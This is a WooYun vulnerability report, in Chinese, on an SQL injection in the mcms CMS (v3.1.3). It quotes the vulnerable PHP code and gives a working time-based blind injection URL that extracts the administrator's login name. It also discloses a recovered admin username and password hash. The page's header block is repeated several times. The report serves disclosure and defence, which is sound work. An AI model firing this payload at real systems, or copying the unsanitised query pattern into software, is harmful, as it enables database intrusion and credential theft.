mcms最新版SQL注入二枚打包（可出任意数据）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0107386

漏洞标题：mcms最新版SQL注入二枚打包（可出任意数据）

漏洞作者：路人甲

提交时间：2015-04-20 15:43

修复时间：2015-07-24 15:45

公开时间：2015-07-24 15:45

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-04-20：细节已通知厂商并且等待厂商处理中
2015-04-25：厂商主动忽略漏洞，细节向第三方安全合作伙伴开放
2015-06-19：细节向核心白帽子及相关领域专家公开
2015-06-29：细节向普通白帽子公开
2015-07-09：细节向实习白帽子公开
2015-07-24：细节向公众公开

简要描述：

mcms最新版SQL注入二枚打包（可出任意数据）

详细说明：

掌易科技的程序员反应相当快啊，确认漏洞当天就修复以后出新版本了，前面在wooyun提的几个漏洞新版的mcms做了相应的处理，发布了新版v_3.1.3.enterprise，再来研究研究。
注入一枚：/app/public/code.php?code_id=6977&txt=test&value=test（注意public文件夹是安装系统时取的名字）post中有两个参数，都存在过滤不严的问题。
Txt和value都存在注入问题，这里我们以txt为例来证明问题的存在。我们看看是如何注入的。
/app/public/code.php

function m__list(){
    global $dbm,$result,$p,$C,$code_id,$T;
    $code_id=isset($_GET['code_id'])?intval($_GET['code_id']):0;//当前分类ID
    $_GET['txt']=isset($_GET['txt'])?trim($_GET['txt']):'';
    $_GET['value']=isset($_GET['value'])?trim($_GET['value']):'';
    $params = array();
    //位置导航
    $result['snav']=array();
    if($code_id>0){
        $result['snav']=$T->tree_father($code_id);
    }
    if(isset($_GET['code_id'])){
        $where = " parent_code_id='$code_id' ";
    }else{
        if($_GET['txt']=='' && $_GET['value']==''){
            $where = " parent_code_id=0 ";
        }else{
            $where = " 1=1 ";
        }
    }
    
    if($_GET['txt']!='') $where.=" and txt like '%{$_GET['txt']}%'";
   
    if($_GET['value']!='') $where.=" and value like '%{$_GET['value']}%'";
    $sql="select * from ".TB_PRE."code where $where order by corder asc";
    $rs=$dbm->query($sql);
$result['list']=$rs['list'];
}

由于该cms没有使用自定义的sqlxss()过滤，存在注入。
Payload:GET提交

/app/public/code.php?code_id=6977&txt=%'/**/and(select/**/if(ord(mid((select/**/login_name/**/from/**/mcms_user/**/limit/**/0,1),1,1))%3d108,sleep(1),0))%23&value=

因为是time-based blind 注入，猜测管理员用户名的第一个字母时，若错误，不延迟，如下图

若正确，延迟，如下图

按上面的方法依次做下去（burp intruder或者自己写个脚本跑），可测试管理员用户名为：mcmsadmin，密码为： f6fdffe48c908deb0f4c3bd36c032e72

漏洞证明：

见详细说明

修复方案：

sqlxss()

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-07-24 15:45

厂商回复：

漏洞Rank：8 (WooYun评价)

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0107386

漏洞标题：mcms最新版SQL注入二枚打包（可出任意数据）

相关厂商：mcms.cc

漏洞作者：路人甲

提交时间：2015-04-20 15:43

修复时间：2015-07-24 15:45

公开时间：2015-07-24 15:45

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0107386

漏洞标题：mcms最新版SQL注入二枚打包（可出任意数据）

相关厂商：mcms.cc

漏洞作者： 路人甲

提交时间：2015-04-20 15:43

修复时间：2015-07-24 15:45

公开时间：2015-07-24 15:45

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0107386"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云